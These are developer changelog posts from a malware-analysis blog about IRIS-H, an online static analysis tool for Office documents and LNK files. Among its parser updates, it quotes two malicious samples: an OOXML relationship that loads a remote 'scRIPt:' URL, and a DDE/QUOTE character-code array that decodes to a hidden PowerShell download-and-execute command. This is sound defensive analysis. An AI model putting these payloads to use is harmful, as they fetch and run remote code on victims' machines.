Malware Analysis: The Final Frontier: 2017

Sunday 10 December 2017

IRIS-H (alpha): Added LNK files "Console Data Block" structure parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: Parser for LNK files "Console Data Block" structure has been added. The parser will attempt to extract all relevant data stored in "Console Data Block" structures. The information about Console Window is stored in these structures.
Outstanding Tasks: None

Detailed Summary

IRIS-H Shell Link (.LNK) file parser has been updated to include data extraction routine for "Console Data Block" structures. The ConsoleDataBlock structure specifies the display settings to use when a link target specifies an application that is run in a console window. Below are just some examples of data stored in these structures:

foreground and background text colors in the console window.
foreground and background text color in the console window popup.
console window buffer size.
console window size.
console window origins coordinates.
font information.
cursor information.
edit settings.

Below screenshot show an example of "Console Data Block" data extracted by IRIS-H.

IRIS-H report showing "Console Data Block" data

Full report can be found here - https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e

Monday 27 November 2017

IRIS-H (alpha): Updated LNK file parser / Command line arguments deobfuscation added

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API & UI (clear browser cache for 'iris-h.service' to see the changes)
Short Description: Parser for LNK files has been updated. Command line arguments string deobfuscation and URL extraction code have been added. UI Report page has been updated to display the new data.
Outstanding Tasks: None

Detailed Summary

IRIS-H Shell Link (.LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string. When the command line arguments string is present, the service will attempt the following:

detect environment variables assignments with 'set' command
detect environment variables usage with ' ! ' and ' % ' special characters
replace referenced environment variables with their corresponding values
remove escaping characters ' ^ ' and ' ` '
detect and extract URL strings
detect string concatenation operations and perform them

Below is a report example showing the new feature in action.

LNK file analysis results showing deobfuscated command line arguments string and extracted URL

Corresponding report - https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c

More examples can be found here:

https://iris-h.services/report/166127261e36b959e48eece2c1b26185

https://iris-h.services/report/2de846108b26101e3554f5964c1a3576

NOTE
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.services website to take effect.

Thursday 16 November 2017

IRIS-H (alpha): Updated OOXML 'document' file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: OOXML 'document' file parser has been updated to detect and extract "Drawing Object Non-Visual Properties".
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are specified as child elements of 'docPr' element." - ECMA-376 Part 1 (section 20.4.2.5)

OOXML 'document' file parser has been updated to extract non-visual object properties associated with inline drawing objects(pictures). The extracted data will be displayed in the corresponding 'document' panel under 'Individual Components' section on the report page. The following properties will be considered:

descr - Specifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.
hidden - Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).
name - Specifies the name of the object. Typically, this is used to store the original file name of a picture object.
title - Specifies the title (caption) of the current DrawingML object.

Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:

'document' panel showing non-visual object properties extracted from inline drawing object

As seen in the screenshot above, these properties might contain digital artifacts that can be helpful in a digital forensics investigation.

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e

IRIS-H (alpha): Added OOXML 'Footer Part' parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API
Short Description: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Footer Part contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-relationship item for the Main Document. Each footer has a corresponding 'ftr' element in a Footer part, which contains the text of the footer." - ECMA-376 Part 1 (section 11.3.6)

A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under 'Individual Components' section on the report page. See an example below:

Example of a Footer Part panel showing extracted text content.

If the extracted content includes special field characters, they will be analysed for presence of blacklisted field character command and if any detected, the findings will be populated in 'Malicious Findings' panel on the report page. Below is the corresponding findings panel:

Corresponding findings panel showing detected field character type

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e

Thursday 9 November 2017

IRIS-H (alpha): Added OOXML Relationships file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI (clear browser cache to see the changes)
Short Description: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.
Outstanding Tasks: None

Detailed Summary

"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one or more relationships can have an associated Relationships part. This part holds the list of relationships for the source part." - ECMA-376 Part 2 (section 9.3.3)

Relationships file example

A new parser for OOXML Relationships file has been added to IRIS-H. The parser is configured to read every Relationship in the Relationships file and extract hyperlinks pointed at external sources. See below for an example of a Relationship that will be detected:

<Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" />

The extracted hyperlinks will be displayed under "Suspicious Finding" panel. See below for an example:

"Suspicious Findings" example showing detected hyperlinks

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97

NOTE
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.malwageddon.com website to take effect.

Wednesday 8 November 2017

IRIS-H (alpha): Updated Field Characters Parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature improvement
Affected Components: API
Short Description: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.
Outstanding Tasks: None

Detailed Summary

Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog post today referencing OOXML document used in an APT type of attack. Document's XML code snippet below show an example of what field characters are used and how they are present in the code.

QUOTE field character usage example

DDE field character and the way its arguments are assembled

Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.

SET command is used to store the value produced by QUOTE command and later passed to DDE command through REF field character. Below is an example of that:

SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35

'c' variable now holds the output (character string built from the array of character codes) from QUOTE command. Later 'c' is referenced in DDE command call as one of the arguments.

DDE REF c

When DDE command is called, the value of 'c' variable will be used as its argument.

IRIS-H field character handlers have been updated to be able to extract the character codes array associated with QUOTE command and decode it. If extraction and decoding is successful the report page will contain the output similar to the one below.

Example of QUOTE command evaluation

This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears in the document when it's opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text appearance sequence cannot be guarantied.

Full report can be found here - https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a

Tuesday 7 November 2017

IRIS-H (alpha): Added support for Shell Link (.LNK) files

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.
Outstanding Tasks: Implement support for missing Extra Data Blocks

Detailed Summary

New binary data parser has been added to IRIS-H service. It can handle processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through Submission page and can also automatically detect them embedded into submitted documents. In either case, the report page will display extracted binary data enriched with human readable description. The enrichment process references the official Microsoft specification for [MS-SHLLINK] Binary File Format.

The parser fully supports the following LNK file structures:

ShellLinkHeader
LinkTargetIDList
LinkInfo
StringData

ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:

EnvironmentVariableDataBlock
KnownFolderDataBlock
SpecialFolderDataBlock
TrackerDataBlock
PropertyStoreDataBlock

Once all binary data is extracted, it'll be subject to a rule-based evaluation. The conclusion will be drawn if the submitted or embedded LNK file can be harmful. IRIS-H will attempt to reconstruct the command line including arguments if any. Below is an example of rule-based evaluation results.

LNK file rule-based evaluation results

A few new sections have been added to "Informational Findings" panel. The sections display information relevant to the LNK file target; file path, working directory, relevant path, command-line arguments, etc. One particular section - "Link Target Tracking" will contain the evaluation results of the data stored in the following Data Blocks:

Droid Volume Identifier
Droid File Identifier
Birth Droid Volume Identifier
Birth Droid File Identifier

Based on this data, IRIS-H will try to identify if the link target file was moved between the volumes on the original computer or if it was moved to another machine. For more information see page 10 of this PDF. Below is an example of "Informational Findings" view.

LNK file Informational Findings example

"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.

Data derived from TrackerDataBlock

ShellLinkHeader section contains time stamps associated with Link Target, as well as, its file attributes, the type of the media it resides on(hard disk, USB, network, etc), media serial number and even command line window state. See below for an example.

Data derived from ShellLinkHeader

In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.

Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock

Examples of full reports can be found on the links below:

https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771 - submitted LNK file.

https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.

Thursday 21 September 2017

Announcement: IRIS-H (alpha) - Online Digital Forensic Tool for Microsoft Office Files

Introduction

IRIS-H is an online web service that performs static analysis of the files stored in a directory-based or strictly structured formats. The service disassembles submitted files into individual components based on the detected file format and performs static analysis of each of the components. The analysis process involves sequentially reading components' binary data and enriching it with human readable information. The enrichment process is based on the binary data description as per official file format specification. Further rule-based evaluation is performed on the extracted data in order to establish if the submitted file can be harmful to a computer system.

Disclaimer

Currently, the service is still being developed and running in alpha phase of the release life cycle. Application updates are pushed regularly and may require full data flush. There is absolutely no guarantee the uploaded data and corresponding generated reports will be available during 'alpha' cycle. Any development/maintenance is done in my free time - this service is the result of a hobby rather than a paid job.

Acknowledgements

I'd like to say 'Thank You!' to the following individuals and organizations for their direct and/or indirect support. 👍

VirusTotal crew
StackOverflow ReactJS and NodeJS communities
Decalage
Individual security researchers who provided their invaluable feedback that materialized into improved and new features (I do not support fame leeching, so no names, but you know who you are)

IRIS-H Service

Pre-history

(skip to the next paragraph if you're not into fairy tales and stuff...)
Once upon a time I decided that challenging myself with learning JavaScript flavors is a great idea... well, still think it's a great idea... So, I set out on a quest to build something as I learn it. Looking far and wide, I thought a simple console based digital forensic tool could be a good start. Little did I know at the time, on how far it will actually take me... and so I ended up creating IRIS-H. The name doesn't really stand for anything with 'Next Generation' or 'Artificial Intelligence' or 'Blockchain' or even 'Cyber' buzz words in mind(sorry, no lasers either), despite having a logo. It's simply my tribute to all the hard working Irish people I had a pleasure to encounter in my last 20 years living in Ireland.

So, what's all about?...

I'd like to share an online tool I've been working on for the last a few months. IRIS-H is mainly being positioned as a digital forensics tool, though it has some rule-based logic it applies in order to determine the outcome of opening the analysed file on a computer system. The digital forensics aspect is revolving around putting descriptive meaning on the binary data derived from the analyzed file. Where possible, the tool attempts to extract digital artifacts to allow for further manual or automated analysis. In the case of malicious files analysis, a trained eye could leverage the tool to help him/her to perform a simple 'campaign' type attribution based on the data derived by the service and their best judgment.

It's important to note that IRIS-H is not a sandbox environment. The submitted file is never opened with its corresponding host application. This slightly limits IRIS-H functionality in terms of obtaining network based indicators of compromise(IoC). Still, the service attempts to evaluate the risk of opening the file on a computer system based on the IoCs derived from the binary data and presence of certain digital artifacts. Sometimes, when you search for a quick answer, this might be all you need.

IRIS-H can do some tricks, but the service is far from being mature. It's at the stage where it just started bringing some value to the work I do, so I hope it can do the same for the others.

Right, what can it do?...

The interaction with the service is done through its web interface. The interface allows for navigation through web pages that offer specific service features.

Home Page - offers ability to view latest file submissions. The view is utilizing a table to present the following data: submission time, submitted file MD5 hash, file name at submission time, detected file type and the result of rule-based risk evaluation.

Latest Submissions table view

Search Page - offers ability to search the service database using MD5, SHA1 or SHA256 hash strings. If a successful analysis already exists for the file with the provided hash the user is forwarded to a corresponding Report Page(more on this below).

Search Form view

Submit Page - offers ability to submit a file to be analyzed. File size and type validations are performed on this page. The page provides 'drag-and-drop' and 'no-submit-button' component to allow service users to select a file to submit. The upload file size limit is set to 10MB. If submitted file type is not supported an alert is spawned notifying the user. Only single file submissions are supported at this time. ZIPed files are not accepted yet.

Submit Page dropzone box

The following are some examples of what IRIS-H service can handle at this stage:

Files saved in Microsoft Office 97-2003 format (DOC, XLS, PPT) - only DOC files are fully supported at the moment
Files saved in Microsoft Office 2007+ format (DOCX, PPTX) - only DOCX files are fully supported at the moment. XLSX are not being accepted yet.
VBA project files extracted from the Microsoft Office documents that are saved in Open Office XML format
Objects embedded into other Microsoft Office documents including those in OOXML format

Technically, IRIS-H will accept and attempt to process any file in OLE-CF format. There are certain case per case limitations though, where the service might not have a parser for a 'not-so-common' OLE stream types.

Once a file is accepted and uploaded, IRIS-H begins dissecting the submitted file into separate components for further automated static analysis. When the analysis is completed, the user is forwarded to a corresponding Report Page.

Report Page is where everything comes together and to help service users navigate through the chunks of information, the page provides a navigation bar.

Left Navigation Bar Example

The information presented on the Report Page is a mixture of high level and 'deep dive' forensics data. The original idea was to be able to export it into a file format that can be stored or shared(like, PDF or similar), but due to some technical challenges I couldn't overcome I enabled report availability through its URL link.

Alright, but what's in it for me?...

Well, one would have to try it out and see, right? 😜 IRIS-H service is available at https://iris-h.malwageddon.com/ . Please make sure you get yourself familiar with Terms of Service. There is also About page that provides more details about the service.

... but just to give you some ideas, the screenshots below highlight some of the findings I came across of using file samples at my disposal.

VBA Digital Signature details

Detection for Microsoft Office field characters

IRIS-H detected embedded VBS script in the submitted file

'deep-dive' digital forensics view of the VBS file reported above.

Results of VBA scripts analysis

Partial view of document embedded form analysis showing UA string hidden in form's tag field

Partial view of document meta data analysis showing URLs stored in the document

'deep-dive' forensics view of a linked object showing object's name and network path where it's stored

'deep-dive' forensics view of data from WordDocument stream showing Revision History, System Fonts and Users data

Example of Extracted Images preview

Example of findings view showing evidence of a linked ZIP file from the document

Example of extracted downloadable artifact (VBA macro script in this case)

Closing Note

If you have any feedback please do not hesitate to reach out. I believe, there is no better way to improve something, but to hear what people think about it.

Pages